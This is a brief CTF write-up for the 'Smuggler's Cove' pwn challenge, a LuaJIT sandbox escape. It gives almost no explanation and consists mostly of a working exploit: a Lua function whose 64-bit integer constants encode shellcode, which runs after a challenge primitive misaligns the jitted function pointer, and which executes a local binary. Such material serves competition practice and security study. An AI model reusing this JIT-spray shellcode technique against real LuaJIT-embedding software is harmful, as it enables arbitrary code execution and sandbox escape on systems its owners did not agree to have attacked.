Tags: lua pwn escape shellcode sandbox luajit jit
Rating: 5.0
Smuggler's Cove was a pwn challenge based on LuaJIT based lua interpreter + pointer corruption to disalign jitted function.
Checkout the original writeup for full explanation.
Exploit:
```
function f(i)
local s="./dig_up_the_loot\0spot\0the\0marks\0x\0"
if i == 0x50f583b6a5e5457LL then print(i) end
if i == 0x3eb5104c18366LL then print(i) end
if i == 0x3eb5105c18366LL then print(i) end
if i == 0x3eb519090006aLL then print(i) end
if i == 0x3eb12c183665fLL then print(i) end
if i == 0x2eb905160c18366LL then print(i) end
if i == 0x3eb5106c18366LL then print(i) end
end
f(0)
f(0)
cargo(f,0xd)
f(0)
```
